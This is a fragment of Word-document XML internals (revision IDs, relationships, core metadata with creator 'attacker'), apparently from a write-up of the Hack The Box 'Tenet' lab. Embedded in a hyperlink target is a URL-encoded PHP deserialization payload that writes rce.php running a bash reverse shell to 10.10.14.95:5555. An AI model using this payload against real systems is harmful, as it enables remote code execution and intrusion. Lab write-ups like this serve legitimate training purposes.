    <w:rsid w:val="003D304D"/>
    <w:rsid w:val="003F1F57"/>
    <w:rsid w:val="003F3B84"/>
    <w:rsid w:val="003F5DBA"/>
    <w:rsid w:val="004379BC"/>
    <w:rsid w:val="00596FD9"/>
    <w:rsid w:val="00601FA8"/>
    <w:rsid w:val="006030A7"/>
    <w:rsid w:val="00660D0F"/>
    <w:rsid w:val="0069101F"/>
    <w:rsid w:val="006A5130"/>
    <w:rsid w:val="007073DE"/>
    <w:rsid w:val="00765BA4"/>
    <w:rsid w:val="007A18E4"/>
    <w:rsid w:val="00812E0C"/>
    <w:rsid w:val="00820ECE"/>
    <w:rsid w:val="00870F5F"/>
    <w:rsid w:val="009924C8"/>
    <w:rsid w:val="00A003FC"/>
    <w:rsid w:val="00B044C3"/>
    <w:rsid w:val="00B2384A"/>
    <w:rsid w:val="00B42DB2"/>
    <w:rsid w:val="00B775AE"/>
    <w:rsid w:val="00BB164A"/>
    <w:rsid w:val="00BF3521"/>
    <w:rsid w:val="00CC04D9"/>
    <w:rsid w:val="00D346AC"/>
    <w:rsid w:val="00D51665"/>
    <w:rsid w:val="00DE2FBC"/>
    <w:rsid w:val="00E10930"/>
    <w:rsid w:val="00E23836"/>
    <w:rsid w:val="00EB7399"/>
    <w:rsid w:val="00F04779"/>
    <w:rsid w:val="00F423F6"/>
    <w:rsid w:val="00F617CC"/>
    <w:rsid w:val="00F631E5"/>
    <w:rsid w:val="00FA09C6"/>
    <w:rsid w:val="00FD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BD47A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0B05E27C-B242-41BA-BBDC-45BA75659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30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sator.tenet.htb/sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A7%3A%22rce.php%22%3Bs%3A4%3A%22data%22%3Bs%3A73%3A%22%3C%3Fphp+exec%28%22%2Fbin%2Fbash+-c+%27bash+-i+%3E+%2Fdev%2Ftcp%2F10.10.14.95%2F5555+0%3E%261%27%22%29%3B+%3F%3E%22%3B%7D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sator.tenet.htb/sator.ph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sator.tenet.htb/rce.php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://10.10.10.22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hyperlink" Target="http://tenet.htb/index.php/2020/12/16/log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12</Pages>
  <Words>443</Words>
  <Characters>2529</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>21</Lines>
  <Paragraphs>5</Paragraphs>
  <ScaleCrop>false</ScaleCrop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attacker</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>saksham dixit</cp:lastModifiedBy>
  <cp:revision>102</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-22T13:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-13T18:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>